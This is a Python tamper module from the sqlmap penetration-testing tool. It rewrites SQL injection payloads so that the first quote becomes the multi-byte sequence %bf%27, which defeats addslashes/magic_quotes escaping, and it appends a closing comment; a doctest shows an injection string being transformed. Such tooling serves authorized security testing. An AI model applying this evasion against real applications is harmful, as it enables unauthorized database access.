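#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

# Trailing tautology of the form "<AND|OR> <term> <=|LIKE> <same term>"
# (e.g. " AND 1=1"). Once the quote has been rewritten the closing comment
# takes over, so this tail is dropped. Compiled once at import time instead
# of being re-parsed on every call.
_TAUTOLOGY_REGEX = re.compile(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2")

# Comment markers that already terminate the remainder of the statement;
# when one is present no extra "-- -" is appended.
_COMMENT_MARKERS = ('#', '--', '/*')

def dependencies():
    """No external dependencies are required by this tamper script."""
    pass

def tamper(payload, **kwargs):
    """
    Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)

    Notes:
        * Useful for bypassing magic_quotes/addslashes feature
        * Only the first quote character of the payload is rewritten;
          any later quotes are passed through unchanged

    Reference:
        * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

    Args:
        payload: the payload string to transform; falsy values (None, "")
            are returned as-is
        **kwargs: accepted for interface compatibility with the tamper
            dispatcher; not used by this script

    Returns:
        the transformed payload

    >>> tamper("1' AND 1=1")
    '1%bf%27-- -'
    """

    retVal = payload

    if payload:
        # Rewrite only the first quote (count=1); 'found' records whether
        # there was anything to rewrite at all.
        found = "'" in payload
        retVal = payload.replace("'", "%bf%27", 1)

        if found:
            stripped = _TAUTOLOGY_REGEX.sub("", retVal)
            if stripped != retVal:
                # A trailing tautology was removed, so the comment is always
                # needed to close off what follows the rewritten quote.
                retVal = stripped + "-- -"
            elif not any(marker in retVal for marker in _COMMENT_MARKERS):
                retVal += "-- -"

    return retVal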